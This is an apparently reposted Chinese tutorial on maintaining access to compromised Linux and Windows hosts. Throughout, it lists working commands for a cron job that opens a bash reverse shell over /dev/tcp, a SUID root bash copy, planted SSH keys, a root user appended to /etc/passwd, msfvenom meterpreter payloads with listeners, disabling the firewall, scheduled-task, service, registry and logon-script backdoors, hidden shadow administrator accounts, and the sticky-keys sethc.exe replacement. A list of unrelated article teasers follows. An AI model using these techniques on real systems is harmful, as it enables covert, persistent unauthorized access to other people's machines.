内网安全:权限维持的各种姿势

1.Linux权限维持

2.Windows权限维持

目录:

一.Linux权限维持:

1.webshell:

2.定时任务:

3.SUID后门:

4.SSH Key免密登录后门:

5.添加用户后门:

二.Windows权限维持

1.计划任务后门:

2.后门服务:

3.注册表自启:

4.L o g o n s c r i p t s 后门:

5.影子账户:

6.shift后门(粘滞键):








一.Linux权限维持:

1.webshell:

利用:

通过文件上传等各种漏洞利用方式,将恶意脚本上传到web服务中去,就可以直接用工具连接

各种编程语言木马  如:shell.php  dama.php   hack.war

2.定时任务:

利用:

通过给目标机器写入一个定时任务,它会自动执行,我们提前进行监听,即可得到目标机器权限

查看定时任务:crontab -u root -l

修改定时任务:crontab -u root -e

删除定时任务:crontab -u root -r

利用:

kali监听:nc -lvvp 7777

centos写入定时任务:

* * * * * bash -i >&/dev/tcp/ip/端口 0>&1   每分钟运行一次

查看是否写入成功:

写入成功后,我们等待上线

成功上线

3.SUID后门:

将root权限给到一个我们创建的新的程序,并且给它添加s权限,下次就可以用普通用户的身份来执行root用户的权限

这个需要我们拿到root权限再执行

root用户执行:cp /bin/bash /var/.hack

chmod 4775 /var/.hack (添加S权限) 普通用户以root用户的权限来运行

ls -al /var/.hack

我们切换到普通用户

普通用户执行: /var/.hack -p    即可得到root权限

4.SSH Key免密登录后门:

利用kali生成秘钥,将秘钥传到目标机器上,即可进行ssh连接,不用输入密码

生成和查看 (kali执行):

ssh-keygen -t rsa

cd /root/.ssh

cat id_rsa.pub (公钥)

写入centos执行:

cd /root//ssh

vim authorized_keys (只要能写入的权限就可以,可以是其他编辑的权限)vi、vim

将我们生成的公钥写进去即可

连接: ssh root@IP

成功

5.添加用户后门:

介绍:

我们可以对目标机器创建一个新的用户,并且赋予它root权限,下次可以直接远程连接得到shell

生成密码:openssl passwd -1 -salt admin 123456

密码生成以后,我们将其添加到passwd中去:

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd

然后我们查看etc/passwd 看是否添加成功

cat etc/passwd

连接(kali执行):

ssh admin@192.168.11.141

二.Windows权限维持

1.计划任务后门:

 

MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe 

监听:msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9997;run"

我们先将防火墙关闭

查看防火墙开关情况:shell netsh firewall show state

发现防火墙开启,那么我们要先将其关闭:shell netsh advfirewall set allprofiles state off

我们查看是否关闭:shell netsh firewall show state

关闭成功

我们将生成的exe上传到目标服务器中

上传成功

创建计划任务:

powershell schtasks /create /tn "\Microsoft\Windows\AppTask\AppRun\updatex" /tr C:\Users\Administrator\Desktop\update.exe /rl highest /F /sc minute /mo 1 /RU system

成功上线

2.后门服务:

kali生成木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9998 -f exe -o back.exe 

监听:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9998;run"

上传木马:

创建后门服务:

sc create backdoor binpath= "cmd.exe /k C:\Users\Administrator\Desktop\back.exe" start= "auto" obj= "Localsystem" 

这个后门服务需要我们重启电脑才能触发,重启电脑

上线成功

3.注册表自启:

MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9981 -f exe -o regrun.exe

监听:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9981;run"

上传木马:

添加注册表命令:

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v regrun /t REG_SZ /d " C:\Users\Administrator\Desktop\regrun.exe"

我们进行重启

成功上线

4.L o g o n s c r i p t s 后门:

MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe

监听:msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9999;run"

上传木马:

添加命令:

REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d " C:\Users\Administrator\Desktop\kms.exe"

重启

成功上线

5.影子账户:

这个需要我们在目标机器上进行添加

创建账户:

创建用户,用户名末尾是$:

net user sysuser1$ 12@H56 /add

加入管理员组:

net localgroup administrators sysuser1$ /add

我们用net user 查看不了这个我们添加的用户 

但是我们查看管理员组是可以看见的:net localgroup administrator sysuser1$,并且在登录页面也可以看到

所以要进一步隐藏

设置SAM权限:

打开Windows的注册表

找到Admin值

显示类型是 x1f4,我们在上面找到这个文件夹,复制F的二进制数据

然后找到我们新添加的sysuser1$的的F文件,将我们复制的粘贴上去

导出注册表:

删除用户:

net user sysuser1$ /del

双击导入两个注册表

(只有注册表中才能看到账号的信息)

开启远程桌面:

最后我们进行连接:

6.shift后门(粘滞键):

覆盖sethc.exe:

#获取整个文件夹及其下面子目录文件的所属权

takeown /f c:\windows\system32\*.* /a /r /d y cacls c:\windows\system32\*.* /T /E /G administrators:F

复制cmd文件,覆盖sethc.exe

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

在登录界面按5次Shift即可获得管理员shell

返回登录页面

按五下shift,成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/870930.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

在 Java 中:为什么不能在 static 环境中访问非 static 变量?

在 Java 中:为什么不能在 static 环境中访问非 static 变量? 1、静态(static)变量2、非静态(非static)变量3、为什么不能访问?4、如何访问?5、总结 💖The Begin&#x1f…

2024年用于在 Python 中构建 API 的 8 个开源框架

什么是API? API是一个软件解决方案,作为中介,使两个应用程序能够相互交互。以下一些特征让API变得更加有用和有价值: 遵守REST和HTTP等易于访问、广泛理解和开发人员友好的标准。API不仅仅是几行代码;这些是为移动开…

安装WindowsTerminal并设置默认以管理员身份运行启动终端

安装WindowsTerminal并设置默认以管理员身份运行启动终端 背景:Microsoft Store打不开,且WindowsTerminal没有默认以管理员身份运行。 下载msixbundle类型的安装包:https://github.com/microsoft/terminal/releases 使用管理员运行Windows …

[RK3308H_Linux] 关于8+2(8路模拟麦克风 + 2路es7243e回采)的调试心得

问题描述 RK3308H 使用8路个模拟麦克风录音,2路用es7243e做回采 解决方案: 首先先调8路模拟麦克风,根据原理图确定使用的是哪路I2S。 以下为dts配置,acodec的属性注释附上。 &acodec {status "okay";rockchip,m…

springBoot(若依)集成camunda

1、下图为项目结构 2、最外层 pom引入依赖 <properties><!--camunda 标明版本&#xff0c;注意要个自己的Spring 版本匹配&#xff0c;匹配关系自行查询官网--><camunda.version>7.18.0</camunda.version> </properties> 3、common模块引入依赖 …

retrofit实现原理

Retrofit 是一个用于 Java 和 Kotlin 的类型安全的 HTTP 客户端&#xff0c;它将 RESTful API 的抽象转换为 Java 接口&#xff0c;使得网络请求变得更加简洁和可读。Retrofit 的实现主要依赖于注解处理器和动态代理机制。下面结合源码分析 Retrofit 的实现原理&#xff1a; R…

靖江美食元宇宙

汉堡是一种流行于世界各地的快餐食品&#xff0c;它的主要成分通常包括一个或多个肉饼&#xff08;最常见的是牛肉饼&#xff09;&#xff0c;放在圆形的面包中间&#xff0c;周围可以添加各种配料和调味品&#xff0c;如生菜、番茄、洋葱、酸黄瓜、奶酪以及各种酱汁&#xff0…

Python 开发植物大战僵尸杂交版辅助【全网最详细_查找 + 代码编写一体化零基础也能学会】

目录 辅助最终展示效果 一、文章介绍 二、工具介绍 三、基址搜索 3.1、寻找阳光基址 3.2、寻找卡槽冷却基址 3.3、寻找僵尸刷新时间基址 3.4、寻找大阳光刷新时间基址 3.5、寻找植物编号基址 3.6、寻找场上僵尸数量基址 3.7、寻找僵尸 X 坐标基址 3.8、通过找到的僵…

编制,傻傻分不清?

目录 01.什么是聘用合同? 02.事业单位如何取得编制 03.如何快速判断岗位否有编制? 1.看公告直接告知 2.看是否有权威依据 3.看合同期限与试用期期限 4.看岗位表 5.咨询招考单位 04.事业单位改革备案制编制(员额制) 05.事业编制 与备案制(员额制)的区别? 1.二…

初学者必看的 3 个 Python 小项目

我们都知道&#xff0c;将知识点融入实际操作是提高编程学习效率的关键。尤其对于初学者来说&#xff0c;通过学习一些涉及核心编程概念的简单项目&#xff0c;不仅可以深化对编程语言的理解&#xff0c;还能快速提高解决问题的能力。 下面将探讨三个基础的 Python 项目&#…

Bilibili Android一二面凉经(2024)

BiliBili Android一二面凉经(2024) 笔者作为一名双非二本毕业7年老Android, 最近面试了不少公司, 目前已告一段落, 整理一下各家的面试问题, 打算陆续发布出来, 供有缘人参考。今天给大家带来的是《BiliBili Android一二面凉经(2024)》。 面试职位: 高级Android开发工程师&…

《昇思25天学习打卡营第1天|QuickStart》

说在前面 曾经接触过华为的910B服务级显卡&#xff0c;当时基于910B做了一些开发的工作&#xff0c;但是总感觉做的事情太低层&#xff0c;想要能自顶向下的了解下&#xff0c;因此开始了MindSpore的学习。另外也想给予提供的显卡&#xff0c;简单尝试下llm模型的训练&#xf…

GCN、GIN

# 使用TuDataset 中的PROTEINS数据集。 # 里边有1113个蛋白质图&#xff0c;区分是否为酶&#xff0c;即二分类问题。# 导包 from torch_geometric.datasets import TUDataset from torch_geometric.data import DataLoader import torch import torch.nn as nn import torch.…

Linux rpm和ssh损坏修复

背景介绍 我遇到的问题可能和你的不一样。但是如果遇到错误一样也可以按此方案尝试修复。 我是想在Linux上安装Oracle&#xff0c;因为必须在离线环境下安装。就在网上搜一篇文章linux离线安装oracle&#xff0c;然后安装教程走&#xff0c;进行到安装oracle依赖包的时候执行了…

数据库mysql-对数据库和表的DDL命令

文章目录 一、什么是DDL操作二、数据库编码集和数据库校验集三、使用步骤对数据库的增删查改1.创建数据库2.进入数据库3.显示数据库4.修改数据库mysqldump 5.删除数据库 对表的增删查改1.添加/创建表2.插入表内容3.查看表查看所有表查看表结构查看表内容 4.修改表修改表的名字修…

SpringBootWeb 篇-入门了解 Swagger 的具体使用

&#x1f525;博客主页&#xff1a; 【小扳_-CSDN博客】 ❤感谢大家点赞&#x1f44d;收藏⭐评论✍ 文章目录 1.0 Swagger 介绍 1.1 Swagger 和 Yapi 的使用场景 2.0 Swagger 的使用方式 2.1 导入 knife4j 的 maven 坐标 2.2 在配置类中加入 knife4j 相关配置 2.3 设置静态资源…

oracle控制文件详解以及新增控制文件

文章目录 oracle控制文件1、 控制文件包含的主要信息如下&#xff1a;2、查看目前系统的控制文件信息&#xff0c;主要是查看相关的字典视图 oracle新增控制文件 oracle控制文件 控制文件是一个很小的二进制文件(10MB左右)&#xff0c;含有数据库结构信息&#xff0c;包括数据…

Open3D 点云Kmeans聚类算法

目录 一、概述 1.1算法介绍 1.2实现步骤 二、代码实现 三、实现效果 3.1原始点云 3.2聚类后点云 前期试读&#xff0c;后续会将博客加入该专栏&#xff0c;欢迎订阅Open3D与点云深度学习的应用_白葵新的博客-CSDN博客 一、概述 1.1算法介绍 聚类是一种将数据集分组的方…

人工智能时代的转型与挑战:从就业替代到技术创新的新纪元

人工智能时代的转型与挑战&#xff1a;从就业替代到技术创新的新纪元 摘要 随着人工智能&#xff08;AI&#xff09;技术的飞速发展&#xff0c;我们正步入一个前所未有的变革时代。本文旨在探讨当前人工智能领域的三大关键趋势——AI对工作岗位的潜在取代、ChatBot技术的厌倦…

redis的发布与订阅

与消息队列的差别 不做持久化 不是异步 不能保证可靠性 使用实例 发布者示例&#xff1a;连接到 Redis 服务器&#xff0c;使用 publish 方法发布消息到指定的频道。 订阅者示例&#xff1a;连接到 Redis 服务器&#xff0c;使用 subscribe 方法订阅指定的频道&#xff0c;并…